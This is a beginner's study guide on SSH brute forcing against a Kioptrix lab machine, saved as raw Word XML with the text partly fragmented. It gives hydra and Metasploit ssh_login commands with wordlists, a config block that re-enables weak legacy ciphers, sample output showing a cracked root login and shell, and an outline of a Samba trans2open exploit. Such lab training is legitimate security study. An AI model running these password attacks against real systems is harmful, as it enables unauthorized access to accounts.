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SSH Brute Force - Study Notes  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A5276" w:val="clear"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="AED6F1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Beginner's Reference Guide | Kali Linux + Kioptrix Lab  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What is Brute Force?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Brute force is when you try many passwords one by one until you find the correct one. Think of it like trying every key on a keychain until one opens the door.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password (-p)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ONE specific password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 -l root -p password123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list (-P)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a FILE full of passwords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 -l root -P wordlist.txt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 list (-L)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many usernames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 -L users.txt -P wordlist.txt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Hydra - Command Line Brute Force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Basic Command Structure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hydra -l USERNAME -P WORDLIST_FILE PROTOCOL://TARGET_IP:PORT -t THREADS -V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-l (lowercase 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username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-l root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-L (uppercase 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 list/file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-L users.txt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-p (lowercase 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-p password123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-P (uppercase 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list/file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-P unix_passwords.txt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threads (speed)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-t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Verbose - show every attempt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port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-s 2222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Common Mistake - p vs P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FADBD8" w:val="clear"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="36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⚠️  REMEMBER: lowercase -p = ONE password | UPPERCASE -P = a whole FILE of passwords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="60"/>
      </w:pP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WRONG - treats the file PATH as the password itself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hydra -l root -p /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.3.129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pP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CORRECT - reads the file and tries each password inside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hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.3.129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The KEX / Cipher Error Fix (Old Machines like Kioptrix)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Old machines like Kioptrix use old encryption. Modern Kali uses new encryption. They can't talk to each other. Fix it by adding legacy support to your SSH config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="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1 - Open SSH config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nano ~/.ssh/config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2 - Paste this inside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Host 192.168.3.129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KexAlgorithms +diffie-hellman-group1-sha1,diffie-hellman-group14-sha1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Ciphers +aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc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HostKeyAlgorithms +ssh-rsa,ssh-dss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MACs +hmac-md5,hmac-sha1,hmac-ripemd160,hmac-sha1-96,hmac-md5-96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3 - Save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Press CTRL+X  then  Y  then  Enter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4 - Run Hydra normally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hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.3.129:22 -t 4 -V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D5F5E3" w:val="clear"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  Safe Note: The config above ONLY applies to 192.168.3.129. Your real internet connections stay fully secure!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Metasploit SSH Login Scanner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When to use Metasploit instead of Hydra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Hydra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Metasploit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&amp; fast brute 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to save sessions/credentials to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Chaining into other exploits after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old SSH ciphers automatically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 (better)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one-off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Step by Step - Metasploit SSH Brute Force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1 - Open Metasploit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msfconsole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2 - Load the SSH login module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use auxiliary/scanner/ssh/ssh_login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3 - See all options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options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4 - Set your target settings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USERNAME root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PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt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RHOSTS 192.168.3.129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THREADS 10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 VERBOSE true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5 - Run it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run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Important Metasploit Options Explained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RHOSTS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IP address (R = Remote)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port (default 22 for SSH)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username to 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with many usernames to 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PASS_FILE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with passwords to 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many attempts at the same time (higher = faster)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VERBOSE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every attempt on screen (true/false)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STOP_ON_SUCCESS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as soon as a password is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BRUTEFORCE_SPEED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0-5 (5 = fastest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠️  Common mistake your mentor made: 'set threads 10' instead of 'set THREADS 10' - options are case sensitive!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What Success Looks Like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Hydra success output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[22][ssh] host: 192.168.3.129   login: root   password: toor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Metasploit success output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[+] 192.168.3.129:22 - Success: 'root:toor' 'uid=0(root)...'</w:t>
      </w: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[*] Command shell session 1 opened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Important - About Kioptrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FADBD8" w:val="clear"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯  Kioptrix Level 1 is NOT meant to be exploited through SSH brute force! It is designed to be exploited through Samba (port 139/445) or Apache vulnerabilities. Your mentor was teaching you HOW to use the tool, not expecting to actually find the password.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The real Kioptrix attack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Scan with nmap to find open ports and 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Look at Samba version on port 139 or 445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Find a Samba exploit in Metasploit (trans2open)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Get a root shell!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2832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-sV 192.168.3.129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Quick Reference Cheat Sheet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 target (is it alive?)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 192.168.3.129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nmap -sV 192.168.3.129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 SSH brute force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 -l root -P wordlist.txt ssh://IP:22 -t 4 -V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Metasploit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msfconsole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SSH scanner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auxiliary/scanner/ssh/ssh_login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SSH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nano ~/.ssh/config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SSH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 ~/.ssh/config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SSH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 ~/.ssh/config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wordlist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/usr/share/wordlists/metasploit/unix_passwords.txt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Rockyou wordlist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/usr/share/wordlists/rockyou.txt.gz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2026-03-11T13:40:34.182Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-11T13:40:34.183Z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